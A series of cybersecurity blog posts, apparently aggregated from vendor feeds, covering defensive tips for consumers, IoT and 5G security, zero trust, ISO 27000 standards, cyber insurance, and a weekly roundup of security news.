The first thing you have to do is make use of an antivirus that will protect you against malicious programs. With so many different kinds of viruses and malware, you need to ensure that you prevent these attacks. Once you have installed antivirus, update it regularly so that its security patch is fool-proof. However, installing an antivirus doesn’t mean that you can browse any site you want to. You will still have to be very careful as hackers can still find ways to get into your system.

Use Unique Passwords for Login

One of the easiest and most prevalent ways hackers get access to your information is by getting hold of your passwords. You must use a unique password for different platforms so that even if one account gets hacked, the hacker can’t access the rest of your accounts. Moreover, you should use a strong password for every account that contains a combination of numbers, upper-case and lower-case letters, special signs, etc. Every little thing that you do to make your password more secure goes a long way.

Get a VPN and Use It

You might have heard about using a VPN when browsing the internet, but most people don’t fully understand what a VPN does. Say that you go to a coffee shop and want to connect to its Wi-Fi. You can never be sure that the network you are using is secure. Whether you are using your home network or a public network, someone can easily steal data from your computer if he bypasses your network security. The best way to prevent that is by using a VPN as it encrypts all your data. Here are some best value VPNs that you can use to secure your computer files.

Use Two Factor Authentication

While I agree that using two-factor authentication can take a lot of time, but let me tell you that it is worth it. Two-factor authentication adds an extra layer of security in case someone bypasses the first one. For example, even if the hacker gets access to your password, he will never be able to access your account without bypassing the second level of authentication.

Protect Your Social Media Privacy

Last but not least, you have to pay some attention to how you use social media. Social media scams are at the peak nowadays as hackers fish for information through these platforms. You have to be extremely careful when using platforms like Facebook as you voluntarily give out your information and present it publically. Make sure that you have configured every social media platform and think twice before revealing any personal information. Once you give out your personal information yourself, you can blame it on anyone but you. After all, regardless of how many security protocols we put into place, the weakest link in the security chain is humans themselves.

The post Cybersecurity 101: How to Protect Yourself from Hackers appeared first on CyberDB.

5G and the IoT: A Look Ahead at What’s Next for Your Home and Community

5G

5G and the IoT: A Look Ahead at What’s Next for Your Home and Community

October is Cybersecurity Awareness Month, which is led by the U.S. government’s Cybersecurity and Infrastructure Security Agency (CISA) in conjunction with the National Cyber Security Alliance (NCSA)—a national non-profit focused on cybersecurity education & awareness. McAfee is pleased to announce that we’re a proud participant.

Imagine it’s 20 years ago and someone at a dinner party predicts that one day you could pop down to the appliance store and buy an internet-connected fridge. Your year 2000 self might have shook that off and then then asked, “Why would someone ever do that?”

Yet here we are.

Today, so much is getting connected. Our appliances, security systems, and even our coffeemakers too.  So far this month, we’ve talked about protecting these connected things and securing these new digital frontiers as Internet of Things (IoT) devices transform not only our homes, but businesses and communities as well.

To wrap up Cybersecurity Awareness Month, let’s take a look ahead at how the next wave of connected devices could take shape by taking a look at the network that billions of them will find themselves on: 5G networks.

5G is the key

You’ve no doubt seen plenty of commercials from the big mobile carriers as they tout the rollout of their new, more powerful 5G networks. And more powerful they are. For starters, 5G is expected to operate roughly 10 times faster than the 4G LTE networks many of us enjoy now—with the potential to get yet faster than that over time.

While mention of faster speeds continues to be the top selling point in ads and the like, 5G offers another pair of big benefits: greater bandwidth and lower latency. Taken together, that means 5G networks can host more devices than before and with a near-instantaneous response time.

The implication of these advances is that billions and billions of new devices will connect to mobile networks directly, at terrific speeds, rather than to Wi-Fi networks. Of those, many billions will be IoT devices. And that means more than just phones.

What will those devices look like?

One answer is plenty more of what we’re already starting to see today—such as commercial and industrial devices that track fleet vehicles, open locks on tractor trailer deliveries based on location, monitor heating and air conditioning systems, oversee supply chains. We’ll also see more devices that manage traffic, meter utilities, and connect devices used in healthcare, energy, and agriculture. That’s in addition to the ones we’ll own ourselves, like wearables and even IoT tech in our cars.

All together, we’ll add about 15 billion new IoT devices to the 26 billion IoT devices already in play today for a total of an expected 41 billion IoT devices in 2025.

Securing 5G and the IoT

Citing those examples of IoT applications underscores the critical need for safety and security in the new 5G networks. This is a network we will count on in numerous ways. Businesses will trust their operations to the IoT devices that operate on it. Cities will run their infrastructure on 5G IoT devices. And we, as people, will use 5G networks for everything from entertainment to healthcare. Not only will IoT devices themselves need protection, yet the networks will need to be hardened for protection as well. And you can be certain that increased network security, and security in general, is a part of our future forecast.

The GSMA, an industry group representing more than 750 operators in the mobile space, calls out the inherent need for security for 5G networks in their 5G Reference Guide for Operators. In their words, “New threats will be developed as attackers are provided live service environment to develop their techniques. 5G is the first generation that recognizes this threat and has security at its foundation.” When you consider the multitude of devices and the multitude of applications that will find their way onto 5G, a “square one” emphasis on security makes absolute sense. It’s a must.

While standards and architectures are taking shape and in their first stages of implementation, we can expect operators to put even more stringent defenses in place, like improved encryption, ways of authenticating devices to ensure they’re not malicious, creating secure “slices” of the network, and more, which can all improve security.

Another consideration for security beyond the oncoming flood of emerging devices and services that’ll find their way onto 5G networks is the sheer volume of traffic and data they’ll generate. One estimate puts that figure of 5G traffic at 79.4 zettabytes (ZB) of data in 2025. (What’s a zettabyte? Imagine a 10 followed by 21 zeroes.) This will call for an evolution in security that makes further use of machine learning and AI to curb a similarly increased volume of threats—with technologies much like you see in our McAfee security products today.

The newest IoT devices making their way into your home

“Siri/Alexa/Cortana/Google, play Neko Case I Wish I Was the Moon.”

We’ve all gotten increasingly comfy with the idea of connected devices in our homes, like our smart assistants. Just in 2018, Juniper Research estimated that there’d be some 8 billion digital voice assistants globally by 2023, thanks in large part to things like smart TVs and other devices for the home. Expect to see more IoT devices like those available for use in and around your house.

What shape and form might they take? Aside from the voice-activated variety, plenty of IoT devices will help us automate our homes more and more. For example, you might have smart sensors in your garden that can tell when your tomatoes are thirsty and activate your soaker hoses for a drink—or other smart sensors placed near your water heater that will text you when they detect a leak.

Beyond that, we’re already purchasing connected lights and smart thermostats, yet how about connecting these things all together to create presets for your home? Imagine a setting called “Movie Night,” where just a simple voice command draws the shades, lowers the lights, turns on the gas fireplace, and fires up the popcorn maker. All you need to do is get your slippers.

Next, add in a degree of household AI, which can learn your preferences and habits. Aspects of your home may run themselves and predict things for you, like the fact that you like your coffee piping hot at 5:30am on Tuesdays. Your connected coffeemaker will have it ready for you.

These scenarios were once purely of the George Jetson variety (remember him?), yet more and more people will get to indulge in these comforts and conveniences as the technology becomes more pervasive and affordable.

Technology for All

One point of consideration with any emerging technology like the IoT on 5G is access.

This year drove home a hard reality: access to high-speed internet, whether via mobile device or a home network is no longer a luxury. It’s a utility. Like running water. We need it to work. We need it to study. We need it to bank, shop, and simply get things done.

Yet people in underserved and rural communities in the U.S. still have no access to broadband internet in their homes. Nearly 6 in 10 of U.S. parents with lower incomes say their child may face digital obstacles in schoolwork because of reduced access to devices and quality internet service. And I’ve heard anecdotes from educators about kids taking classes online who have to pull into their school’s parking lot to get proper Wi-Fi, simply because they don’t have a quality connection at home.

The point is this: as these IoT innovations continue to knit their way into our lives and the way the world works, we can’t forget that there’s still a digital divide that will take years of effort, investment, and development before that gap gets closed. And I see us closing that gap in partnership, as people and communities, businesses and governments, all stand to benefit when access to technology increases.

So as we look to the future, my hope is that we all come to see high-speed internet connections for what they are—an absolute essential—and take the steps needed to deliver on it. That’s an advance I’d truly embrace.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

 

 

The post 5G and the IoT: A Look Ahead at What’s Next for Your Home and Community appeared first on McAfee Blogs.

Data-Centric Security for the Cloud, Zero Trust or Advanced Adaptive Trust?

Over the last few months, Zero Trust Architecture (ZTA) conversations have been top-of-mind across the DoD. We have been hearing the chatter during industry events all while sharing conflicting interpretations and using various definitions. In a sense, there is an uncertainty around how the security model can and should work. From the chatter, one thing is clear – we need more time. Time to settle in on just how quickly mission owners can classify a comprehensive and all-inclusive, acceptable definition of Zero Trust Architecture.

Today, most entities utilize a multi-phased security approach. Most commonly, the foundation (or first step) in the approach is to implement secure access to confidential resources. Coupled with the shift to remote and distance work, the question arises, “are my resources and data safe, and are they safe in the cloud?”

Thankfully, the DoD is in the process of developing a long-term strategy for ZTA. Industry partners, like McAfee, have been briefed along the way. It has been refreshing to see the DoD take the initial steps to clearly define what ZTA is, what security objectives it must meet, and the best approach for implementation in the real-world. A recent DoD briefing states “ZTA is a data-centric security model that eliminates the idea of trusted or untrusted networks, devices, personas, or processes and shifts to a multi-attribute based confidence levels that enable authentication and authorization policies under the concept of least privilege access”.

What stands out to me is the data-centric approach to ZTA. Let us explore this concept a bit further. Conditional access to resources (such as network and data) is a well-recognized challenge. In fact, there are several approaches to solving it, whether the end goal is to limit access or simply segment access. The tougher question we need to ask (and ultimately answer) is how to do we limit contextual access to cloud assets? What data security models should we consider when our traditional security tools and methods do not provide adequate monitoring? And is securing data, or at least watching user behavior, enough when the data stays within multiple cloud infrastructures or transfers from one cloud environment to another?

Increased usage of collaboration tools like Microsoft 365 and Teams, SLACK and WebEx are easily relatable examples of data moving from one cloud environment to another. The challenge with this type of data exchange is that the data flows stay within the cloud using an East-West traffic model. Similarly, would you know if sensitive information created directly in Office 365 is uploaded to a different cloud service? Collaboration tools by design encourage sharing data in real-time between trusted internal users and more recently with telework, even external or guest users. Take for example a supply chain partner collaborating with an end user. Trust and conditional access potentially create a risk to both parties, inside and outside of their respective organizational boundaries. A data breach whether intentional or not can easily occur because of the pre-established trust and access. There are few to no limited default protection capabilities preventing this situation from occurring without intentional design. Data loss protection, activity monitoring and rights management all come into question. Clearly new data governance models, tools and policy enforcement capabilities for this simple collaboration example are required to meet the full objectives of ZTA.

So, as the communities of interest continue to refine the definitions of Zero Trust Architecture based upon deployment, usage, and experience, I believe we will find ourselves shifting from a Zero Trust model to an Advanced Adaptive Trust model. Our experience with multi-attribute-based confidence levels will evolve and so will our thinking around trust and data-centric security models in the cloud.

 

 

The post Data-Centric Security for the Cloud, Zero Trust or Advanced Adaptive Trust? appeared first on McAfee Blogs.

Seven Tips for Protecting Your Internet-Connected Healthcare Devices

Healthcare from Smartphone

Seven Tips for Protecting Your Internet-Connected Healthcare Devices: Cybersecurity Awareness Month

October is Cybersecurity Awareness Month, which is led by the U.S. government’s Cybersecurity and Infrastructure Security Agency (CISA) in conjunction with the National Cyber Security Alliance (NCSA)—a national non-profit focused on cybersecurity education & awareness. McAfee is pleased to announce that we’re a proud participant.

Fitness trackers worn on the wrist, glucose monitors that test blood sugar without a prick, and connected toothbrushes that let you know when you’ve missed a spot—welcome to internet-connected healthcare. It’s new realm of care with breakthroughs big and small. Some you’ll find in your home, some you’ll find inside your doctor’s office, yet all of them are connected. Which means they all need to be protected. After all, they’re not tracking any old data. They’re tracking our health data, one of the most precious things we own.

What is internet-connected healthcare?

Internet-connected healthcare, also known as connected medicine, is a broad topic. On the consumer side, it covers everything from smart watches that track health data to wireless blood pressure monitors that you can use at home. On the practitioner side, it accounts for technologies ranging from electronic patient records, network-enabled diagnostic devices, remote patient monitoring in the form of wearable devices, apps for therapy, and even small cameras that can be swallowed in the form of a pill to get a view of a patient’s digestive system.

Additionally, it also includes telemedicine visits, where you can get a medical issue diagnosed and treated remotely via your smartphone or computer by way of a video conference or a healthcare provider’s portal—which you can read about more in one of my blogs from earlier this year. In all, big digital changes are taking place in healthcare—a transformation that’s rapidly taking shape to the tune of a global market expected to top USD 534.3 billion by 2025.

Privacy and security in internet-connected healthcare

Advances in digital healthcare have come more slowly compared to other aspects of our lives, such as consumer devices like phones and tablets. Security is a top reason why. Not only must a healthcare device go through a rigorous design and approval process to ensure it’s safe, sound, and effective, it also held to similar rigorous degrees of regulation when it comes to medical data privacy. For example, in the U.S., we have the Health Insurance Portability and Accountability Act of 1996 (HIPAA), which sets privacy and security standards for certain health information.

Taken together, this requires additional development time for any connected medical device or solution, in addition to the time it takes to develop one with the proper efficacy. Healthcare device manufacturers cannot simply move as quickly as, say, a smartphone manufacturer can. And rightfully so.

Seven tips for protecting your internet-connected healthcare devices

However, for this blog, we’ll focus on the home and personal side of the equation, with devices like fitness trackers, glucose monitors, smart watches, and wearable devices in general—connected healthcare devices that more and more of us are purchasing on our own. To be clear, while these devices may not always be categorized as healthcare devices in the strictest (and regulatory) sense, they are gathering your health data, which you should absolutely protect. Here are some straightforward steps you can take:

1) First up, protect your phone

Many medical IoT devices use a smartphone as an interface, and as a means of gathering, storing, and sharing health data. So whether you’re an Android owner or iOS owner, get security software installed on your phone so you can protect all the things it accesses and controls. Additionally, installing it will protect you and your phone in general as well.

2) Set strong, unique passwords for your medical IoT devices

Some IoT devices have found themselves open to attack because they come with a default username and password—which are often published on the internet. When you purchase any IoT device, set a fresh password using a strong method of password creation.  And keep those passwords safe. Instead of keeping them on a notebook or on sticky notes, consider using a password manager.

3) Use two-factor authentication

You’ve probably come across two-factor authentication while banking, shopping, or logging into any other number of accounts. Using a combination of your username, password, and a security code sent to another device you own (typically a mobile phone) makes it tougher for hackers to crack your device. If your IoT device supports two-factor authentication, use it for extra security.

4) Update your devices regularly

This is vital. Make sure you have the latest updates so that you get the latest functionality from your device. Equally important is that updates often contain security upgrades. If you can set your device to receive automatic updates, do so.

5) Secure your internet router

Your medical IoT device will invariably use your home Wi-Fi network to connect to the internet, just like your other devices. All the data that travels on there is personal and private use already, and that goes double for any health data that passes along it. Make sure you use a strong and unique password. Also change the name of your router so it doesn’t give away your address or identity. One more step is to check that your router is using an encryption method, like WPA2, which will keep your signal secure. You may also want to consider investing in an advanced internet router that has built-in protection, which can secure and monitor any device that connects to your network.

6) Use a VPN and a comprehensive security solution

Similar to the above, another way you can further protect the health data you send over the internet is to use a virtual private network, or VPN. A VPN uses an encrypted connection to send and receive data, which shields it from prying eyes. A hacker attempting to eavesdrop on your session will effectively see a mish-mash of garbage data, which helps keep your health data secure.

7) When purchasing, do your research

One recent study found that 25% of U.S. homeowners with broadband internet expect to purchase a new connected consumer health or fitness device within the next year. Just be sure yours is secure. Read up on reviews and comments about the devices you’re interested in, along with news articles about their manufacturers. See what their track record is on security, such as if they’ve exposed data or otherwise left their users open to attack.

Take care of your health, and your health data

Bottom line, when we speak of connected healthcare, we’re ultimately speaking about one of the most personal things you own: your health data. That’s what’s being collected. And that’s what’s being transmitted by your home network. Take these extra measures to protect your devices, data, and yourself as you enjoy the benefits of the connected care you bring into your life and home.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Seven Tips for Protecting Your Internet-Connected Healthcare Devices appeared first on McAfee Blogs.

The Best Anti-Malware Software in 2020

With the rising digital insecurity in 2020, it is necessary to use the best anti-malware software or seek an alternative. Here’s the reason:

The onset of the fourth industrial revolution has seen work and other business activities switch operations to the online market. Sadly, most of these tech consumers have little knowledge of ‘staying safe online’.

Hackers and other malware developers are taking this advantage to promote cyberbullying, online scams, and other sorts of crimes. You need enlightenment to evade such threats. A typical solution is to use an anti-malware. However, there’s a catch:

As anti-malware companies seek to secure their customers, developers of malware up their game to override the security systems.

Does this mean anti-malware technology is dead or alive? Are you helpless? No. Here are options of anti-malware to give a try. Check which one anti-malware software is the best, and to make it simpler to settle for a particular anti-malware, read on to find out the ranking parameters.

Norton is the best anti-malware software in 2020 because it has the most updated security and best user experience. What are its features? What are its alternatives? Let’s take a deep dive below.

Parameters for Ranking the Best Anti-Malware Software in 2020

Due to the demand for a better user experience, 2020 demands extra features besides security. These include:

Detection Time

As a consumer of the gig economy, your computer usage revolves around browsing the internet, downloading, and sharing files. This calls for real-time malware detection. Real-time detection simply means ‘detect and malware and react immediately’.

The anti-malware tracks the websites and links you visit. It scans the links before you click them. Whenever it detects ‘danger’, it stops your browser from communicating with the threats.

The simultaneous reaction is a huge boost from the former culture of waiting for the malware to access the sensitive files of your computer, then notify or try to fight the malware that is already interfering with your sensitive documents.

Password Management

Since every hacker attacks your files for some gain, most malware strives to grab your passwords for two reasons. First, the password is a gateway to sensitive files. Secondly, the password unlocks your bank accounts and credit cards.

To boost storage and browsing confidence, Norton 360 and other world-class anti-malware take the responsibility of managing your passwords.

Cloud Backups

To improve security, the best anti-malware ensures everything occurs at lightning speeds. Instead of using local storage, companies utilize the efficiency and security of cloud storage.

They are, then, faster in the identification of malware and feeding the data onto cloud servers. The data retrieve process also happens at the speed of light.

They proceed to back up your internal files with the cloud databases. In case of a severe malware attack, you can retrieve your sensitive files from the cloud version. 

Works in Various Environments

The best anti-malware software for 2020 works on many types of devices and operating systems. Examples of the typical operating software are macOS, Windows, iOS, and Android.

Again, it does deep scanning of the system for a variety of malware. Examples of malware are trojan horses, spyware, worms, and viruses.

Lightweight

2020 demands an anti-malware software that allows your computer to load sites faster. This calls for consuming less of your computer’s memory. Reason?

With the fast-paced gig economy, product consumers, employers, and most clients need immediate feedback. Consequently, it is useless to have an anti-malware that is ruthless with malware but slows your computer speed.

To speed up the machine, anti-malware software like Avira has in-system acceleration tools to propel your computer’s speed.

Other Services?

Norton 360, as the best anti-malware software in the market, has the best user experience and VPN technology. It has one the easiest to navigate user interfaces.

To take the lead in anti-malware ranking, it has boosted its customer support system. You get timely and detailed email replies when you seek help. To better user experience, they offer VPN services— enabling you to access censored networks.

Other Anti-Malwares to Consider

You can as well dedicate the third eye to Malwarebytes. Its premium version gives you an ocean of benefits, typical for protection in 2020. Alternatively, check Kaspersky and Avira anti-malware.

Conclusion

For all-in-one malware protection, check out Norton 360 anti-malware software. Alternatively, consider Malwarebytes, Kaspersky, and Avira anti-malware software.

The software gives you the best security, usability, and a world-class support system. More importantly, Norton 360 adjusts quickly to the changing malware forms.

The post The Best Anti-Malware Software in 2020 appeared first on CyberDB.

What is the ISO 27000 series of standards?

The ISO/IEC 270001 family of standards, also known as the ISO 27000 series, is a series of best practices to help organisations improve their information security.

Published by ISO (the International Organization for Standardization) and the IEC (International Electrotechnical Commission), the series explains how to implement best-practice information security practices.

an.

It does this by setting out ISMS (information security management system) requirements.

An ISMS is a systematic approach to risk management, containing measures that address the three pillars of information security: people, processes and technology.

The series consists of 46 individual standards, including ISO 27000, which provides an introduction to the family as well as clarifying key terms and definitions.

You don’t need a comprehensive understanding of ISO standards to see how the series works, and some won’t be relevant to your organisation, but there are a few core ones that you should be familiar with.

ISO 27001

This is the central standard in the ISO 27000 series, containing the implementation requirements for an ISMS.

This is important to remember, as ISO IEC 27001: 2013 is the only standard in the series that organisations can be audited and certified against.

That’s because it contains an overview of everything you must do to achieve compliance, which is expanded upon in each of the following standards.

ISO 27002

This is a supplementary standard that provides an overview of information security controls that organisations might choose to implement.

Organisations are only required to adopt controls that they deem relevant – something that will become apparent during a risk assessment.

The controls are outlined in Annex A of ISO 27001, but whereas this is essentially a quick rundown, ISO 27002 contains a more comprehensive overview, explaining how each control works, what its objective is and how you can implement it.

ISO 27017 and ISO 27018

These supplementary ISO standards were introduced in 2015, explaining how organisations should protect sensitive information in the Cloud.

This has become especially important recently as organisations migrate much of their sensitive information on to online servers.

ISO 27017 is a code of practice for information security, providing extra information about how to apply the Annex A controls to information stored in the Cloud.

Under ISO 27001, you have the choice to treat these as a separate set of controls. So, you’d pick a set of controls from Annex A for your ‘normal’ data and a set of controls from ISO 27017 for data in the Cloud.

ISO 27018 works in essentially the same way but with extra consideration for personal data.

ISO 27701

This is the newest standard in the ISO 27000 series, covering what organisations must do when implementing a PIMS (privacy information management system).

It was created in response to the GDPR (General Data Protection Regulation), which instructs organisations to adopt “appropriate technical and organisational measures” to protect personal data but doesn’t state how they should do that.

ISO 27701 fills that gap, essentially bolting privacy processing controls onto ISO 27001.

Why use an ISO 27000-series standard?

Data breaches are one of the biggest information security risks that organisations face. Sensitive data is used across all areas of businesses these days, increasing its value for legitimate and illegitimate use.

Countless incidents occur every month, whether it’s cyber criminals hacking into a database or employees losing or misappropriating information. Wherever the data goes, the financial and reputational damage caused by a breach can be devastating.

That’s why organisations are increasingly investing heavily in their defences, using ISO 27001 as a guideline for effective security.

ISO 27001 can be applied to organisations of any size and in any sector, and the framework’s broadness means its implementation will always be appropriate to the size of the business.

You can find out how to get started with the Standard by reading Information Security & ISO 27001: An introduction.

This free green paper explains:

  • What ISO 27001 is, how an ISMS works and how it relates to ISO 9001, ISO 27002 and other standards;
  • The importance of risk assessments and risk treatment plans;
  • How the Standard helps you meet your legal and regulatory obligations; and
  • Your audit and certification requirements.

Subscribe to our Weekly Round-up

A version of this blog was originally published on 10 October 2019.

The post What is the ISO 27000 series of standards? appeared first on IT Governance UK Blog.

Watch Here: How to Build a Successful AppSec Program

Cyberattackers and threat actors won???t take a break and wait for you to challenge them with your security efforts ??? you need a proactive application security (AppSec) program to get ahead of threats and remediate flaws quickly. It???s critical that you stand up an AppSec program covering all the bases, from which roles each team member will have to alignment on KPIs and goals, and even a detailed application inventory to stay on top of your code.

But it isn???t enough to simply set ground rules and define your goals; good AppSec programs succeed because they come from the top-down, with stakeholders committed at the executive level. This helps maintain accountability and ensures that developers and security professionals are aligned when it comes to targets for flaw remediation. Part of that effort involves standing up a Security Champions program, too, enabling your developers to work alongside security and take ownership over securing their code.

If you follow these and other recommendations, your AppSec program should run like a well-oiled machine with the flexibility and security you need to keep creating innovative applications. Watch this video to learn about what goes into building a successful AppSec program, andツ?check out the full How-to Series here.ツ?

ツ?

This Week in Security News: Cybercriminals Use Stolen Data and Hacking Tools as Prizes in Poker Games and Rap Battles and VirusTotal Now Supports Trend Micro ELF Hash

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how cybercriminals are passing the time during the COVID-19 pandemic with online poker games, where the prizes include stolen data. Also, read about how VirusTotal now supports Trend Micro ELF Hash (aka telfhash).

 

Read on:

Cybercriminals Use Stolen Data and Hacking Tools as Prizes in Poker Games and Rap Battles

Cybercriminals have put their own spin on passing time during the COVID-19 lockdown with online rap battles, poker tournaments, poem contests, and in-person sport tournaments. The twist is that the prize for winning these competitions is sometimes stolen data and tools to make cybercrime easier, according to new research from Trend Micro.

Becoming an Advocate for Gender Diversity: Five Steps that Could Shape Your Journey

Sanjay Mehta, senior vice president at Trend Micro, was recently named a new board member at Girls In Tech—a noted non-profit and Trend Micro partner working tirelessly to enhance the engagement, education, and empowerment of women in technology. In this blog, Sanjay shares five steps that you can use to become an ally for diversity in the workplace.

October Patch Tuesday: Microsoft Patches Critical, Wormable RCE Bug

In this month’s Patch Tuesday update, Microsoft pushed out fixes for 87 security vulnerabilities – 11 of them critical – and one of those is potentially wormable. There are also six bugs that were previously unpatched but publicly disclosed, which could give cybercriminals a leg up — and in fact at least one public exploit is already circulating for this group.

VirusTotal Now Supports Trend Micro ELF Hash

To help IoT and Linux malware researchers investigate attacks containing Executable and Linkable Format (ELF) files, Trend Micro created telfhash, an open-source clustering algorithm that helps cluster Linux IoT malware samples. VirusTotal has always been a valuable tool for threat research and now, with telfhash, users of the VirusTotal Intelligence platform can pivot from one ELF file to others.

New Emotet Attacks Use Fake Windows Update Lures

File attachments sent in recent Emotet campaigns show a message claiming to be from the Windows Update service, telling users that the Office app needs to be updated. Naturally, this must be done by clicking the Enable Editing button. According to the Cryptolaemus group, since yesterday, these Emotet lures have been spammed in massive numbers to users located all over the world.

Metasploit Shellcodes Attack Exposed Docker APIs

Trend Micro recently observed an interesting payload deployment using the Metasploit Framework (MSF) against exposed Docker APIs. The attack involves the deployment of Metasploit’s shellcode as a payload, and researchers said this is the first attack they’ve seen using MSF against Docker. It also uses a small, vulnerability-free base image in order for the attack to proceed in a fast and stealthy manner.

Barnes & Noble Warns Customers It Has Been Hacked, Customer Data May Have Been Accessed

American bookselling giant Barnes & Noble is contacting customers via email, warning them that its network was breached by hackers, and that sensitive information about shoppers may have been accessed. In the email to customers, Barnes & Noble says that it became aware that it had fallen victim to a cybersecurity attack on Saturday, October 10th.

ContentProvider Path Traversal Flaw on ESC App Reveals Info

Trend Micro researchers found ContentProvider path traversal vulnerabilities in three apps on the Google Play store, one of which had more than 5 million installs. The three applications include a keyboard customization app, a shopping app from a popular department store, and the app for the European Society of Cardiology (ESC). Fortunately, the keyboard and department store apps have both been patched by developers. However, as of writing this blog, the ESC app is still active.

Carnival Corp. Ransomware Attack Affects Three Cruise Lines

Hackers accessed personal information of guests, employees and crew of three cruise line brands and the casino operations of Carnival Corp. in a ransomware attack the company suffered on Aug. 15, officials have confirmed. Carnival Cruise Line, Holland America Line and Seabourn were the brands affected by the attack, which Carnival said they’re still investigating in an update on the situation this week.

Docker Content Trust: What It Is and How It Secures Container Images

Docker Content Trust allows users to deploy images to a cluster or swarm confidently and verify that they are the images you expect them to be. In this blog from Trend Micro, learn how Docker Content Trust works, how to enable it, steps that can be taken to automate trust validation in the continuous integration and continuous deployment (CI/CD) pipeline and limitations of the system.

Twitter Hackers Posed as IT Workers to Trick Employees, NY Probe Finds

A simple phone scam was the key first step in the Twitter hack that took over dozens of high-profile accounts this summer, New York regulators say. The hackers responsible for the July 15 attack called Twitter employees posing as company IT workers and tricked them into giving up their login credentials for the social network’s internal tools, the state’s Department of Financial Services said.

What is a DDoS Attack? Everything You Need to Know About Distributed Denial-of-Service Attacks and How to Protect Against Them

A distributed denial-of-service (DDoS) attack sees an attacker flooding the network or servers of the victim with a wave of internet traffic so big that their infrastructure is overwhelmed by the number of requests for access, slowing down services or taking them fully offline and preventing legitimate users from accessing the service at all. DDoS attacks are one of the crudest forms of cyberattacks, but they’re also one of the most powerful and can be difficult to stop.

Cyberattack on London Council Still Having ‘Significant Impact’

Hackney Council in London has said that a cyberattack earlier this week is continuing to have a “significant impact” on its services. Earlier this week, the north London council said it had been the target of a serious cyberattack, which was affecting many of its services and IT systems.

 

Surprised by the new Emotet attack?  Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Cybercriminals Use Stolen Data and Hacking Tools as Prizes in Poker Games and Rap Battles and VirusTotal Now Supports Trend Micro ELF Hash appeared first on .

BA fined record £20m for customer data breach

Personal details of more than 400,000 customers accessed by hackers in 2018

A £183m fine levied on British Airways for a data breach has been reduced to £20m after investigators took into account the airline’s financial plight and the circumstances of the cyber-attack.

The £20m fine is nonetheless the biggest ever issued by the Information Commissioner’s Office (ICO), following the 2018 incident in which more than 400,000 customers’ personal details were compromised by hackers.

Continue reading...

Cyber insurance: A guide for businesses

Cyber threats are so numerous that it’s impossible to prevent security incidents altogether.

That’s why they organisations increasingly relying on cyber insurance policies to cover the costs when data breaches and cyber attacks occur.

But just how helpful is cyber insurance? We take at a look at everything you need to know in this blog.

What is cyber insurance?

Cyber insurance is a specific type of protection, helping organisations mitigate the financial costs associated with information security incidents.

These costs typically won’t be included in standard business insurance policies, which tend to cover only the damage or loss of equipment itself, rather than harm caused by a cyber security event.

How does cyber insurance work?

When a covered organisation suffers a security incident and submits a claim, the insurer will investigate and then pay out accordingly.

Security incidents cause many issues that can’t be fixed with financial reimbursement, such as the time and effort it takes to recover or the reputational damage you could face.

Likewise, the cost of a data breach is related to the speed at which organisations can detect and respond to an incident. Indeed, Ponemon Institute’s Cost of a Data Breach Report 2020 found that organisations that can address a breach within 200 days save about £750,000 compared to those that take longer to respond.

If organisations have to wait for their insurer to review the incident, the costs will escalate and their premium will increase.

You must therefore view cyber insurance as a complement to your cyber security defences and an extra resource to mitigate costs rather than an alternative.

What does a cyber insurance policy cover?

Cyber insurance covers the financial costs of incidents that affect the confidentiality, integrity and availability of information. This includes cyber attacks and data breaches, as well as other events that impact IT systems and networks.

Policies generally provide organisations with the means to manage the incident. This includes forensic investigation, incident response, legal assistance and public relations support.

What is not covered by cyber insurance?

Cyber insurance policies generally don’t cover damages that were caused or exacerbated by the organisation itself.

This might include business email compromise fraud or acts of gross negligence.

Likewise, some insurers won’t reimburse organisations that pay up after a ransomware attack, given that experts advise organisations not to pay because payment helps fuel the cyber crime industry and could make the organisation a soft target for future attacks.

Who needs cyber insurance?

Any organisation that relies on information technology or processes sensitive data is vulnerable to cyber attacks and data breaches, and should therefore consider cyber insurance.

You can find out whether cyber insurance is the right strategy by following ISO 27001’s risk assessment methodology, which helps organisations decide the most appropriate way to address cyber security issues.

Organisations can:

  • Modify the risk by applying security controls that will reduce the likelihood of it occurring and/or damage it will cause.
  • Retain the risk by accepting that it falls within previously established risk acceptance criteria, or via extraordinary decisions.
  • Avoid the risk by changing the circumstances that are causing it.
  • Share the risk with a partner, such as a cyber insurance firm or a third party that is better equipped to manage the risk.

How much does cyber insurance cost?

An AdvisorSmith study found that the average cost of cyber insurance was $1,500 (about £1,160) per year for $1 million (£770,000) in coverage.

However, the costs will vary greatly depending on the organisation’s size, industry, the amount of sensitive data it processes and the strength of its existing cyber security measures.

Some insurers may also offer different levels of protection. For example, you could pay less each month but be covered against a smaller set of damages – or vice versa.

Is my existing cyber security enough?

Organisations are free to decide whether they should purchase cyber insurance.

In most cases, there is no legal or contractual requirement to have cyber insurance, so the organisation might decide that its budget is better spent on cyber defences and business continuity management.

However, there may well be times where it makes financial sense to invest in cyber insurance, for example when the costs of a breach far exceed the amount you would be paying in coverage.

Also, it’s worth remembering that almost all insurance brokers state that the organisation must take appropriate steps to prevent security incidents.

Make sure you have the right defences in place with our Cyber Security as a Service.

With this annual subscription service, our experts are on hand to advise you on the best way to protect your organisation.

They’ll guide you through a variety of security practices – including vulnerability scans, staff training and the creation of policies and procedures – ensuring that you have the foundations of an effective security strategy.

These measures will help you stay one step ahead of cyber criminals, preventing a wide array of threats and putting you in a position to claim competitive cyber insurance rates.

The post Cyber insurance: A guide for businesses appeared first on IT Governance UK Blog.

Hot off the Press: Veracode Named a 2020 Gartner Peer Insights Customers’ Choice for AST

Veracode has been officially recognized by Gartner Peer Insights as a 2020 Customers??? Choice for Application Security Testing. The report includes Veracode???s aggregate score of 4.6 out of 5 stars out of 95 independent customer reviews (as of July 31, 2020), and of the reviewers, 92 percent said that they would recommend Veracode???s AST solutions.

Veracode, the largest global provider of application security (AST) solutions. We received the Customers??? Choice distinction, just months after Veracode was named a Leader for the seventh consecutive time in the Gartner Inc. 2020 Magic Quadrant for Application Security Testing, is a true testament to our solutions.

